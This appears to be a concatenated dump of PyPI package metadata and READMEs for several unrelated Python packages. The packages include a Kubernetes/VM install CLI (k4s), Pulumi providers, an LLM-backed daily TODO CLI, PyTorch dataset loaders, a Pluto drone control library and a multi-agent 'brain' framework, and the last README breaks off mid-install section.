] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:27:27.466101 | pulumi_ns1-3.9.0a1771568506.tar.gz | 77,255 | da/a4/b3f54c22ad2bbfe73e682c1b0ef4ca68e42d7516dcc0539a6bb7d5c55c21/pulumi_ns1-3.9.0a1771568506.tar.gz | source | sdist | null | false | ddd18127227b57baa25a46b5e4032e70 | 917af049395038cf873142bb8eaa52935eee986c1211b2e3fe15b705fea30793 | daa4b3f54c22ad2bbfe73e682c1b0ef4ca68e42d7516dcc0539a6bb7d5c55c21 | null | [] | 195 |
2.4 | k4s | 0.0.1a4 | A CLI tool for managing installations and Kubernetes operations | # k4s
A CLI tool for managing installations and Kubernetes operations.
It helps install and operate:
- **VM-based products** over SSH (systemd services, OS packages, file layout)
- **Kubernetes-based products** via Helm (with safer targeting via k8s contexts)
## Installation
Recommended (isolated install):
```bash
pipx install k4s
```
Alternative:
```bash
pip install --upgrade k4s
```
## Quick start
Initialize local state:
```bash
k4s init
```
Add a **VM** context (SSH target) and set it as current:
```bash
k4s context add prod-vm --type vm --host 10.0.0.10 --username root --password '...'
k4s context use-context prod-vm
k4s context ping
```
Add a **K8s** context and set it as current:
```bash
k4s context add demo-k8s --type k8s --kubeconfig ~/.kube/config --kubectl-context gke_demo --namespace sep
k4s context use-context demo-k8s
k4s context ping
```
## Core concepts
### Contexts (targets)
`k4s` always operates against a **context**:
- **VM contexts**: SSH connection info (host, username, auth)
- **K8s contexts**: kubeconfig + kubectl context + (optional) default namespace
If `--context` is omitted, `k4s` uses the **current context** (set via `k4s context use-context`).
### Verbosity
- **`-q/--quiet`**: only final results and errors (also suppresses update notices)
- **default**: concise step output
- **`-v`**: show step logs
- **`-vv`**: debug output
### Dry run
Most commands support `--dry-run` to print the plan without applying changes.
## Products and commands
### VM products (SSH)
- **Docker Engine**: `k4s install docker`
- **Nexus**: `k4s install nexus`
- **Dataiku**: `k4s install dataiku`
- **R integration (for an existing Dataiku install)**: `k4s install r`
Health checks (works even if the product was not installed by k4s):
```bash
k4s status nexus
k4s status dataiku --context prod-vm
```
### TLS:
```bash
k4s tls enable nexus --issuer self-signed --domain nexus.example.com
k4s tls enable dataiku --issuer acme --domain dss.example.com --email admin@example.com
```
### Kubernetes products (Helm)
- **ingress-nginx**: `k4s install ingress-nginx`
- **Starburst Enterprise**: `k4s install starburst`
- **Starburst components**: `k4s install hive|ranger|cache`
- **Datafloem**: `k4s install datafloem`
Upgrades:
```bash
k4s upgrade starburst --force
k4s upgrade datafloem
```
Example Helm values files:
- See `examples/helm-values/`
## Kubernetes clusters (RKE2)
Create an RKE2 cluster using **VM node contexts**:
```bash
k4s cluster preflight --control-plane cp1 --worker w1
k4s cluster create --name lab --type rke2 --control-plane cp1 --worker w1 --cni canal
k4s cluster kubeconfig --name lab --control-plane cp1
```
## Updates
When installed from PyPI, `k4s` checks once per day for a newer version and prints a notice:
```text
Update available: 0.0.1a1 → 0.0.2 (run: pip install --upgrade k4s)
```
## Development
```bash
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
pip install -e .
pytest
```
## Security notes
- Do **not** commit license files, JWT secrets, or registry credentials.
- Prefer environment variables for credentials when supported by the command.
| text/markdown | Ali Aktaş | null | null | null | Proprietary | null | [
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: System Administrators",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: System :: Installation/Setup"
] | [] | https://github.com/aliakts/k4s | null | >=3.9 | [] | [] | [] | [
"click",
"PyYAML",
"requests",
"tqdm",
"paramiko",
"rich",
"cryptography",
"packaging"
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.12.0 | 2026-02-20T06:27:03.018174 | k4s-0.0.1a4.tar.gz | 86,405 | 06/92/7a7d079c59fbe2de8c9efc9e09f35264ea28962906ac9c8bf712688cc136/k4s-0.0.1a4.tar.gz | source | sdist | null | false | fb890083b9823ed6b9ad64360c83e724 | 64b9013375332f5795e7f3c05dc94f2b9b570355c060bd9f14cf47cf4fc6a531 | 06927a7d079c59fbe2de8c9efc9e09f35264ea28962906ac9c8bf712688cc136 | null | [] | 201 |
2.4 | pulumi-mysql | 3.3.0a1771568386 | A Pulumi package for creating and managing mysql cloud resources. | [](https://github.com/pulumi/pulumi-mysql/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/mysql)
[](https://pypi.org/project/pulumi-mysql)
[](https://badge.fury.io/nu/pulumi.mysql)
[](https://pkg.go.dev/github.com/pulumi/pulumi-mysql/sdk/v3/go)
[](https://github.com/pulumi/pulumi-mysql/blob/master/LICENSE)
# MySQL Resource Provider
The MySQL resource provider for Pulumi lets you manage MySQL resources in your cloud programs. To use
this package, please [install the Pulumi CLI first](https://pulumi.io/).
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (Java/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/mysql
or `yarn`:
$ yarn add @pulumi/mysql
### Python
To use from Python, install using `pip`:
$ pip install pulumi_mysql
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-mysql/sdk/v3
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Mysql
## Configuration
The following configuration points are available:
- `mysql:endpoint` (required) - The address of the MySQL server to use. Most often a "hostname:port" pair, but may also
be an absolute path to a Unix socket when the host OS is Unix-compatible. Can be set via `MYSQL_ENDPOINT` environment variable.
- `mysql:username` (required) - Username to use to authenticate with the server. Can be set via `MYSQL_USERNAME` environment variable.
- `mysql:password` - (optional) Password for the given user, if that user has a password. Can be set via `MYSQL_PASSWORD` environment variable.
- `mysql:tls` - (optional) The TLS configuration. One of false, true, or skip-verify. Defaults to `false`. Can be set via
`MYSQL_TLS_CONFIG` environment variable.
- `mysql:proxy` - (Optional) Proxy socks url, can also be sourced from `ALL_PROXY` or `all_proxy` environment variables.
## Reference
For further information, please visit [the MySQL provider docs](https://www.pulumi.com/docs/intro/cloud-providers/mysql) or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/mysql).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, mysql | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.0.0a1",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-mysql"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:27:00.972315 | pulumi_mysql-3.3.0a1771568386.tar.gz | 16,404 | 6a/46/dcabde317cb0f337487e0ba234e9648b5de2d1a2a589212edbd226bd8bd8/pulumi_mysql-3.3.0a1771568386.tar.gz | source | sdist | null | false | 54a210573c6273a392348462770a3a3f | c190ab2c901d5cb1d9a0804d4d1e38249f2fbb13439c61b4b68c7d0fc9f3ea8d | 6a46dcabde317cb0f337487e0ba234e9648b5de2d1a2a589212edbd226bd8bd8 | null | [] | 196 |
2.4 | pylabwons | 1.0.8 | SNOWBALL REVERSES LABWONS | # pylabwons
For now, this project is only for testing
| text/markdown | null | null | null | null | null | null | [] | [] | null | null | >=3.10 | [] | [] | [] | [
"lxml",
"pandas",
"plotly",
"pyarrow",
"pykrx",
"pytz",
"scipy",
"ta"
] | [] | [] | [] | [] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T06:25:21.140363 | pylabwons-1.0.8.tar.gz | 20,827 | 20/b3/9c4ce5e998db2cb2087a11271029af1322d3f0e7e8a51a1c895682a8e5c2/pylabwons-1.0.8.tar.gz | source | sdist | null | false | 74b87217ff5ed716a879a1e3e0062764 | c710d85645a7babec7a9004e571f94b7d4e4a4ee388e0280e7812cff375f1a1e | 20b39c4ce5e998db2cb2087a11271029af1322d3f0e7e8a51a1c895682a8e5c2 | null | [
"LICENSE"
] | 217 |
2.4 | daily-todo | 0.3.0 | Daily TODO CLI:Markdown 日程 + LLM 生成/更新/总结 | # Daily TODO
Daily TODO CLI:在环境变量指定的目录下管理按日期命名的 Markdown 文件,并用 LLM 生成当日计划、理解自然语言更新任务、做日/周总结。
## 功能
1. **管理 Markdown**:在 `DAILY_TODO_DIR` 指定的文件夹下按 `YYYY-MM-DD.md` 管理每日文件。
2. **生成当日日程**:基于「昨天」的 Markdown 内容,用 LLM 生成「今天」的任务列表并写入当日文件。
3. **查看与更新**:查看任务列表与状态;用自然语言更新(完成、新增、废弃、改描述),由 LLM 解析意图并写回文件。
4. **总结**:对单日或过去一周的日程做 LLM 总结。
## 环境变量
| 变量 | 说明 |
| ----------------- | ------------------------------------------------------------------- |
| `DAILY_TODO_DIR` | 存放每日 Markdown 的目录;未设置时使用当前目录下的 `./daily-todo`。 |
| `OPENAI_API_KEY` | **必填**。OpenAI 或兼容 API 的密钥(如 DeepSeek、OpenAI 等)。 |
| `OPENAI_BASE_URL` | 可选。API 地址,例如 `https://api.deepseek.com`。 |
| `OPENAI_MODEL` | 可选。模型名,默认 `gpt-4o-mini`。 |
## 安装使用
```bash
pip install daily-todo
# 或
uv tool install daily-todo
```
配置 env 到 `.zshrc`,完成后执行一次 `source ~/.zshrc`:
```sh
cat >> ~/.zshrc << 'EOF'
# daily-todo
alias dcli=daily-todo
export OPENAI_BASE_URL=http://localhost:11434/v1
export OPENAI_API_KEY=ollama
export OPENAI_MODEL=qwen2.5:7b-instruct
export DAILY_TODO_DIR="$HOME/.daily-todos"
EOF
source ~/.zshrc
```
```bash
daily-todo --help
# use alias
dcli --help
```
## 命令示例
```bash
# 根据昨天生成今天的任务并写入今日文件(默认今天)
dcli generate
dcli generate --date 2025-02-21
# 查看今日任务列表与状态
dcli list
dcli list --date 2025-02-20
# 用自然语言更新当日任务
dcli update "完成第1项"
dcli update "新增写周报、废弃第3项" --date 2025-02-20
# 日总结(指定日期,默认今天)
dcli summary daily
dcli summary daily --date 2025-02-20
# 周总结(过去 7 天,默认到今天)
dcli summary weekly
dcli summary weekly --date 2025-02-20
```
## 每日文件格式
- 文件名为 `YYYY-MM-DD.md`。
- 建议结构:
- `# 日期` 或简短标题
- `## 任务`:每行 `- [ ]` / `- [x]` / `- [~]` 表示未完成 / 已完成 / 已废弃。
- 可选:`## 进展`、`## 备注` 等自由文本,供 LLM 总结与生成下一日参考。
示例:
```md
# 2026-02-20
## 任务
- [x] 开发CLI
- [ ] 发布到PyPI
## 日总结
今日完成开发任务。
```
## Development
### 本机调试
```bash
cd daily-todo
uv sync
cp env.example .env
uv run python main.py generate # 或 list / update / summary 等
```
内容参考项目根目录 `env.example`,按需改成本地路径与 API 配置即可。
| text/markdown | null | null | null | null | null | null | [] | [] | null | null | >=3.12 | [] | [] | [] | [
"typer>=0.12.0",
"openai>=1.0.0",
"python-dotenv>=1.0.0"
] | [] | [] | [] | [] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T06:24:14.761577 | daily_todo-0.3.0.tar.gz | 8,499 | 2d/55/9fc0c619b091087270210311c41d0ace58cf8ef60c769247dd09c405aeee/daily_todo-0.3.0.tar.gz | source | sdist | null | false | 41f77ca62b52a99c00b4b77cabe6da58 | 1a0754268ab89bbfa66e6c1a82d708dd523bf2cb9e153cb8fd39e676be9ac60e | 2d559fc0c619b091087270210311c41d0ace58cf8ef60c769247dd09c405aeee | null | [] | 221 |
2.4 | any-gold | 0.3.0 | Custom PyTorch Dataset implementations for publicly available datasets across various modalities | # any-gold
Have you ever been in a situation where you wanted to experiment with a new dataset and wasted a few hours
of your time before even having access to the data? We did, and we truly believe that it should not be like that anymore.
Any Gold is thus a comprehensive collection of custom PyTorch Dataset implementations for
publicly available datasets across various modalities.
## Purpose
The goal of this repository is to provide custom PyTorch `Dataset` classes
that are compatible with PyTorch's `DataLoader` to facilitate experimentation
with publicly available datasets. Each dataset implementation includes
automated download functionality to locally cache the data before use. Instead of spending time to access the data,
you can focus on experimenting with it.
## Features
- **PyTorch Integration**: All datasets implement the PyTorch `Dataset` interface
- **Automatic Downloads**: Built-in functionality to download and cache datasets
locally
- **Multimodal Support**: Datasets spanning various data types and domains
- **Consistent API**: Uniform interface across different dataset implementations
- **Minimal Dependencies**: Core dependencies are managed with `uv`
## Available Datasets
### Image Datasets
- `PlantSeg`: Large-scale in-the-wild dataset for plant disease segmentation ([Paper](https://arxiv.org/abs/2409.04038), [Zenodo](https://zenodo.org/records/14935094))
- `MVTecADDataset`: Anomaly detection dataset for industrial inspection ([Paper](https://link.springer.com/content/pdf/10.1007/s11263-020-01400-4.pdf), [Hugging Face](https://huggingface.co/datasets/TheoM55/mvtec_all_objects_split))
- `KPITask1PatchLevel`: A dataset for kidney disease segmentation ([Paper](https://arxiv.org/pdf/2502.07288), [Synapse](https://www.synapse.org/Synapse:syn63688309))
- `DeepGlobeRoadExtraction`: Road extraction from satellite images ([Paper](https://arxiv.org/pdf/1805.06561), [Kaggle](https://www.kaggle.com/datasets/balraj98/deepglobe-road-extraction-dataset))
- `ISIC2018SkinLesionDataset`: A dataset for skin lesion segmentation([Paper](https://doi.org/10.1038/sdata.2018.161), [Hugging Face](https://huggingface.co/datasets/surajbijjahalli/ISIC2018))
- `PascalVOC2012Segmentation`: A dataset for semantic segmentation ([Website](http://www.pascal-network.org/challenges/VOC/voc2012/workshop/index.html), [Kaggle](https://www.kaggle.com/datasets/gopalbhattrai/pascal-voc-2012-dataset))
## Usage
```python
import any_gold as ag
from torch.utils.data import DataLoader
# Initialize dataset (downloads data if not already present)
dataset = ag.AnyDataset()
# Create DataLoader
dataloader = DataLoader(dataset, batch_size=32, shuffle=True)
# Iterate through batches
for batch in dataloader:
# Your training/evaluation code here
pass
```
## Contributing
### Process
Contributions are welcome! To contribute to this project:
1. Fork the repository on GitHub
2. Clone your fork: `git clone https://github.com/yourusername/any-gold.git`
3. Create a new branch for your feature: `git checkout -b feature-name`
4. Install development dependencies (see below)
5. Set up pre-commit hooks: `uv run pre-commit install`
6. Implement a new class that inherits from `AnyDataset`
7. Include download functionality for the dataset
8. Add appropriate documentation and tests (pytest) for your dataset class
9. Ensure code passes all pre-commit checks
10. Submit a pull request to the main repository
We use pre-commit hooks to maintain code quality:
- Ruff for linting and formatting
- MyPy for type checking
### Installation
Dependencies in this repository are managed with [`uv`](https://github.com/astral-sh/uv),
a fast Python package installer and resolver. The dependencies are defined in the
`pyproject.toml` file.
```bash
# Clone the repository
git clone https://github.com/yourusername/any-gold.git
cd any-gold
# Install dependencies with uv
uv sync --all-extras
source .venv/bin/activate
```
### Release Process
To release a new version of the `any-gold` package:
1. Create a new branch for the release: `git checkout -b release-vX.Y.Z`
2. Update the version `vX.Y.Z` in `pyproject.toml`
3. Run `uv sync` to update the lock file
4. Commit the changes with a message like `release vX.Y.Z`
5. Merge the branch into `main`
6. trigger a new release on GitHub with the tag `vX.Y.Z`
| text/markdown | null | goldener-data <yann.chene.tni@gmail.com> | null | null | null | null | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"Programming Language :: Python :: 3.13",
"Topic :: Scientific/Engineering :: Artificial Intelligence"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"torch",
"torchvision",
"pathlib",
"pandas",
"numpy",
"datasets",
"kagglehub",
"zenodo-client",
"synapseclient",
"opencv-python",
"pytest; extra == \"dev\"",
"pre-commit; extra == \"dev\"",
"ruff; extra == \"dev\"",
"mypy; extra == \"dev\"",
"pandas-stubs; extra == \"dev\"",
"opencv-stubs; extra == \"dev\"",
"types-tqdm; extra == \"dev\"",
"fiftyone; extra == \"tools\""
] | [] | [] | [] | [
"Homepage, https://github.com/goldener-data/any-gold",
"Repository, https://github.com/goldener-data/any-gold",
"Issues, https://github.com/goldener-data/any-gold/issues"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T06:24:12.447733 | any_gold-0.3.0.tar.gz | 22,191 | 8f/6d/03b8c8dd18ce134c1a05d83f15288a9a6548954fc79c6fa3eee40918a1e5/any_gold-0.3.0.tar.gz | source | sdist | null | false | 30afbac72f2b011f24af8aa7cab31c59 | 31d121d9b69e30686dddfc1f8f54bfac2c3894ff3bb572b383c7670b488452a3 | 8f6d03b8c8dd18ce134c1a05d83f15288a9a6548954fc79c6fa3eee40918a1e5 | Apache-2.0 | [
"LICENSE"
] | 220 |
2.4 | plutocontrol | 1.0.1 | A library for controlling Pluto drones | # plutocontrol
plutocontrol is a Python library for controlling Pluto drones. This library provides various methods to interact with the drone, including connecting, controlling movements, and accessing sensor data.
## Installation
```bash
pip install plutocontrol
```
## Usage
After installing the package, you can import and use the `Pluto` class in your Python scripts.
### Configuration
By default, the package connects to the drone at IP `192.168.4.1` on port `23`. You can customize these values when creating a Pluto instance:
```python
from plutocontrol import Pluto
# Use default IP (192.168.4.1) and port (23)
pluto = Pluto()
# Use custom IP address when in ST mode
pluto = Pluto(ip='192.168.1.100')
```
### Example Usage
#### Example 1: Basic Usage (Default IP)
```python
from plutocontrol import Pluto
# Create an instance of the Pluto class with default IP (192.168.4.1:23)
pluto = Pluto()
# Connect to the drone
pluto.connect()
# Arm the drone
pluto.arm()
# Disarm the drone
pluto.disarm()
# Disconnect from the drone
pluto.disconnect()
```
#### Example 2: Custom IP Address when drone is connected to router with ST mode
```python
from plutocontrol import Pluto
import time
# Create an instance with custom IP
pluto = Pluto(ip='192.168.1.100')
# Connect to the drone
pluto.connect()
time.sleep(1)
# Arm and take off
pluto.arm()
time.sleep(2)
pluto.take_off()
time.sleep(5)
# Fly forward
pluto.forward()
time.sleep(2)
pluto.reset()
# Land and disconnect
pluto.land()
time.sleep(3)
pluto.disconnect()
```
## Class and Methods
### Pluto Class
#### `Connection`
Commands to connect/ disconnect to the drone server.
```python
#Connects from the drone server.
pluto.connect()
#Disconnects from the drone server.
pluto.disconnect()
```
#### `Camera module`
Sets the IP and port for the camera connection. should be initialized before pluto.connect().
```python
pluto.cam()
```
#### `Arm and Disarm Commands`
```python
#Arms the drone, setting it to a ready state.
pluto.arm()
#Disarms the drone, stopping all motors.
pluto.disarm()
```
#### `Pitch Commands`
```python
#Sets the drone to move forward.
pluto.forward()
#Sets the drone to move backward.
pluto.backward()
```
#### `Roll Commands`
```python
#Sets the drone to move left (roll).
pluto.left()
#Sets the drone to move right (roll).
pluto.right()
```
#### `Yaw Commands`
```python
#Sets the drone to yaw right.
pluto.right_yaw()
#Sets the drone to yaw left.
pluto.left_yaw()
```
#### `Throttle Commands`
Increase/ Decrease the drone's height.
```Python
#Increases the drone's height.
pluto.increase_height()
#Decreases the drone's height.
pluto.decrease_height()
```
#### `Takeoff and Land`
```Python
#Arms the drone and prepares it for takeoff.
pluto.take_off()
#Commands the drone to land.
pluto.land()
```
#### `Developer Mode`
Toggle Developer Mode
```Python
#Turns the Developer mode ON
pluto.devOn()
#Turns the Developer mode OFF
pluto.devOff()
```
#### `motor_speed(motor_index, speed)`
Sets the speed of a specific motor (motor index from 0 to 3).
```Python
pluto.motor_speed(0, 1500)
```
#### `Get MSP_ALTITUDE Values`
```python
#Returns the height of the drone from the sensors.
height = pluto.get_height()
#Returns the rate of change of altitude from the sensors.
vario = pluto.get_vario()
```
#### `Get MSP_ALTITUDE Values`
```python
#Returns the roll value from the drone.
roll = pluto.get_roll()
#Returns the pitch value from the drone.
pitch = pluto.get_pitch()
#Returns the yaw value from the drone.
yaw = pluto.get_yaw()
```
#### `Get MSP_RAW_IMU Values`
##### `Accelerometer`
Returns the accelerometer value for the x,y,z - axis.
```python
#Returns the accelerometer value for the x-axis.
acc_x = pluto.get_acc_x()
#Returns the accelerometer value for the y-axis.
acc_y = pluto.get_acc_y()
#Returns the accelerometer value for the z-axis.
acc_z = pluto.get_acc_z()
```
#### `Gyroscope`
Returns the Gyroscope value for the x,y,z - axis.
```python
#Returns the Gyroscope value for the x-axis.
gyro_x = pluto.get_gyro_x()
#Returns the Gyroscope value for the y-axis.
gyro_y = pluto.get_gyro_y()
#Returns the Gyroscope value for the z-axis.
gyro_z = pluto.get_gyro_z()
```
#### `Magnetometer`
Returns the Magntometer value for the x,y,z - axis.
```python
#Returns the Magnetometer value for the x-axis.
mag_x = pluto.get_mag_x()
#Returns the Magnetometer value for the y-axis.
mag_y = pluto.get_mag_y()
#Returns the Magnetometer value for the z-axis.
mag_z = pluto.get_mag_z()
```
#### `Calibration Commands`
```python
#Calibrates the accelerometer.
pluto.calibrate_acceleration()
#Calibrates the magnetometer.
pluto.calibrate_magnetometer()
```
#### `Get MSP_Analog Values`
```python
#Returns the battery value in volts from the drone.
battery = pluto.get_battery()
#Returns the battery percentage from the drone.
battery_percentage = pluto.get_battery_percentage()
```
## Enhanced Battery Telemetry (Mobile App Features)
The package now supports enhanced battery telemetry matching the mobile app functionality, with support for multiple MSP protocol versions.
### Protocol Version Detection
The drone's MSP protocol version is automatically detected:
```python
# Check protocol version
print(f"Protocol Version: {pluto.MSP_Protocol_Version}")
```
### Comprehensive Battery Information
Get all battery information in one call:
```python
#Get comprehensive battery info (all parameters)
battery_info = pluto.get_battery_info()
# Protocol V1 returns:
# {
# 'voltage': '11.25V',
# 'current': '1250mA',
# 'capacity_drawn': '450mAh',
# 'capacity_remaining': '1350mAh',
# 'state_of_charge': '75%',
# 'auto_land_mode': 0,
# 'protocol': 'V1 (Enhanced)'
# 'protocol': 'V1 (Enhanced)'
# }
```
### Battery Helper Methods
Convenient methods to check battery status without parsing raw values.
```python
# Get status string ('FULL', 'TWO_BAR', 'ONE_BAR', 'EMPTY')
status = pluto.get_battery_level_status()
# Check for critical battery (< 20%)
if pluto.is_battery_critical():
print("LAND NOW!")
# Check if auto-landing is triggered
if pluto.should_auto_land():
print("Drone is auto-landing due to low battery")
# Get a full summary dict (for UI/Display)
summary = pluto.get_battery_status_summary()
print(f"Icon: {summary['icon']} | Voltage: {summary['voltage']}")
```
### Individual Telemetry Parameters
#### Enhanced Telemetry on Primus X2 / V5 boards
```python
#Get compensated battery voltage in volts
voltage = pluto.get_battery_voltage_compensated()
#Get current draw in milliamps
current = pluto.get_current_mA()
#Get capacity consumed in mAh
capacity_drawn = pluto.get_capacity_drawn_mAh()
#Get remaining capacity in mAh
capacity_remaining = pluto.get_capacity_remaining_mAh()
#Get state of charge (0-100%)
soc = pluto.get_state_of_charge()
#Get auto-land mode status
auto_land = pluto.get_auto_land_status()
```
#### Basic Telemetry on Pluto / V4 boards
```python
#Get battery voltage
voltage = pluto.get_battery_voltage_compensated()
#Get current draw
current = pluto.get_current_mA()
#Get signal strength (RSSI)
rssi = pluto.get_rssi()
#Get power meter sum
power_sum = pluto.get_power_meter_sum()
```
### Telemetry Data Structure
**Protocol Version 1:**
- `vBatComp`: Battery voltage compensated (in centiv olts, divide by 100 for volts)
- `mAmpRaw`: Current draw in milliamps
- `mAhDrawn`: Capacity consumed in milliamp-hours
- `mAhRemain`: Remaining capacity in milliamp-hours
- `soc_Fused`: State of charge percentage (0-100)
- `auto_LandMode`: Auto-land mode status (0=off, 1=on)
**Other Versions:**
- `bytevbat`: Battery voltage in decivolts (divide by 10 for volts)
- `pMeterSum`: Power meter sum
- `rssi`: Signal strength indicator
- `amperage`: Current draw in milliamps
## Wifi Configuration (Telnet / AT Commands)
To control multiple drones in the same network or to change the drone's Wifi settings (Stations Mode - ST), you can configure the Pluto drone using Telnet commands.
### Prerequisites
- A Telnet client (e.g., [Putty](https://www.putty.org/) for Windows, or terminal `telnet` for Mac/Linux).
- Connect your computer to Pluto's Wifi (Default SSID: `Pluto_XXXX`, Password: `dronaaviation`).
### Accessing Configuration
1. Connect to Pluto's Wifi.
2. Open your Telnet client.
3. Connect to **IP: 192.168.4.1** on **Port: 23**.
### Testing Connection
Type the following command:
```text
+++AT
```
Response should be `OK`.
### Common AT Commands
| Command | Description |
|---------|-------------|
| `+++AT` | Test connection. Response: `OK` |
| `+++AT RESET` | Soft reset the ESP (Wifi Module) |
| `+++AT MODE` | Print current mode settings |
| `+++AT MODE <mode>` | Set Wifi mode: <br> `1` : **STA** (Station Mode - Connect to Router) <br> `2` : **AP** (Access Point - Default) <br> `3` : **Both** |
| `+++AT STA` | Print current Station SSID and Password |
| `+++AT STA <SSID> <password>` | Set the Router SSID and Password for Station Mode |
### Example: Setting up Station Mode (Connecting Pluto to Router)
To connect your Pluto drone to your home router so you can control it alongside other devices:
1. Connect to Pluto via Telnet.
2. Set the Router credentials:
```text
+++AT STA MyRouterName MyRouterPassword
```
3. Change mode to Station (or Both):
```text
+++AT MODE 3
```
4. Reset the drone/modules for changes to take effect.
## Debugging and Developer Mode
If you are developing custom features or want to see what's happening inside the drone, you can enable **Serial Debug Mode**. This prints debug messages from the drone directly to your terminal.
```python
# Enable Developer Mode (Serial Debug Output)
pluto.devOn()
# ... perform actions ...
# Disable Developer Mode
pluto.devOff()
```
**Note:** The library automatically detects and prints both:
- **MSP Debug Packets**: Structural debug data sent by the flight controller.
- **Raw Serial Strings**: `printf` style logs used in custom firmware.
## Beginner Project Ideas
Here are some simple projects to get started with `plutocontrol`.
### Project 1: The "Hello World" Flight
A simple script to take off, hover for 3 seconds, and land.
```python
from plutocontrol import Pluto
import time
my_pluto = Pluto()
my_pluto.connect()
print("Arming...")
my_pluto.arm()
time.sleep(2)
print("Taking Off!")
my_pluto.take_off()
time.sleep(3) # Hover for 3 seconds
print("Landing...")
my_pluto.land()
time.sleep(2)
my_pluto.disarm()
my_pluto.disconnect()
```
### Project 2: Keyboard Controller
Control your drone using your computer keyboard!
```python
from plutocontrol import Pluto
import threading
import keyboard # pip install keyboard
pluto = Pluto()
pluto.connect()
pluto.arm()
def control_loop():
while True:
if keyboard.is_pressed('w'): pluto.forward()
elif keyboard.is_pressed('s'): pluto.backward()
elif keyboard.is_pressed('a'): pluto.left()
elif keyboard.is_pressed('d'): pluto.right()
elif keyboard.is_pressed('space'): pluto.take_off()
elif keyboard.is_pressed('x'): pluto.land()
elif keyboard.is_pressed('q'): break # Quit
else:
# Reset RC to neutral if keys released
pluto.rcPitch = 1500
pluto.rcRoll = 1500
control_loop()
pluto.disarm()
pluto.disconnect()
```
| text/markdown | Omkar Dandekar | Omkar Dandekar <omi007dandekar@gmail.com> | null | null | null | null | [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent"
] | [] | https://github.com/DronaAviation/plutocontrol.git | null | >=3.7 | [] | [] | [] | [] | [] | [] | [] | [
"Homepage, https://github.com/DronaAviation/plutocontrol.git"
] | twine/6.2.0 CPython/3.14.2 | 2026-02-20T06:24:11.551829 | plutocontrol-1.0.1.tar.gz | 17,598 | 89/12/c8d0a582a89e510c348c86308f7f771b63982656986ec3a91a64babd2eb8/plutocontrol-1.0.1.tar.gz | source | sdist | null | false | a6c74b92137a4fc07b59ed68e7c8bc50 | 9f56bdda4d85181501efea9ea9171fdadf91b9c9781756100f384aa58c3f35d5 | 8912c8d0a582a89e510c348c86308f7f771b63982656986ec3a91a64babd2eb8 | null | [
"LICENSE"
] | 213 |
2.4 | brain-system | 0.4.0 | A multi-agent cognitive architecture powered by LangGraph — five specialized AI agents modeled after the human brain. | <div align="center">
# 🧠 Brain System
### A Multi-Agent Cognitive Architecture Powered by LangGraph
*Five specialized AI agents — modeled after the human brain — collaborate to process your input and generate thoughtful, nuanced responses.*
[](https://www.python.org/downloads/)
[](https://pypi.org/project/brain-system/)
[](https://github.com/langchain-ai/langgraph)
[](LICENSE)
</div>
---
## 🧩 How It Works
Brain System maps biological brain functions to specialized AI agents that process every input in parallel — just like the human brain:
```mermaid
graph LR
A[User Input] --> B[🔵 Sensory Agent<br>Thalamus]
B --> C[🟣 Memory Agent<br>Hippocampus]
B --> D[🟢 Logic Agent<br>Frontal Lobe]
B --> E[🔴 Emotional Agent<br>Amygdala]
C --> F[🟡 Executive Agent<br>Prefrontal Cortex]
D --> F
E --> F
F --> G[Final Response]
```
| Agent | Brain Analog | What It Does |
|:------|:-------------|:-------------|
| **Sensory** | Thalamus & Sensory Cortex | Multi-layer signal classification, pattern recognition, salience detection |
| **Memory** | Hippocampus | Persona biography retrieval via ZVec semantic search |
| **Logic** | Left Frontal Lobe & DLPFC | Deductive/inductive reasoning, fallacy detection, counter-arguments |
| **Emotional** | Amygdala, Insula & Cingulate | Emotional profiling, empathy reading, ethical safety checks |
| **Executive** | Full Prefrontal Cortex | Conflict resolution between agents, response calibration, integrated output |
## 🎭 Persona Mode
The Brain can embody famous personalities — or anyone you provide a biography for.
### Pre-curated Personas
8 personalities sourced from their autobiographies are available out of the box — **instant loading, no LLM call required:**
| Persona | ID | Source |
|:--|:--|:--|
| 🕊️ Mahatma Gandhi | `gandhi` | *The Story of My Experiments with Truth* |
| 🔬 Albert Einstein | `einstein` | *The World As I See It* |
| ✊ Nelson Mandela | `mandela` | *Long Walk to Freedom* |
| ⚗️ Marie Curie | `curie` | *Madame Curie* by Ève Curie |
| 🎨 Leonardo da Vinci | `davinci` | Personal Notebooks |
| ✝️ Martin Luther King Jr. | `mlk` | *Stride Toward Freedom* |
| ⚡ Nikola Tesla | `tesla` | *My Inventions* |
| 💻 Ada Lovelace | `lovelace` | Notes on the Analytical Engine |
### Custom Personas
Upload any biography or autobiography (`.txt` / `.pdf`), and the system extracts personality traits, speech patterns, reasoning style, and emotional tendencies — then injects tailored context into each agent. The Logic Agent thinks in their reasoning style, the Emotional Agent mirrors their emotional tendencies, and the Executive Agent speaks in their voice.
> **Example:** Select Nelson Mandela → ask about dealing with conflict → get a response reflecting his values of reconciliation, strategic patience, and ubuntu philosophy.
## 📦 Install
```bash
pip install brain-system
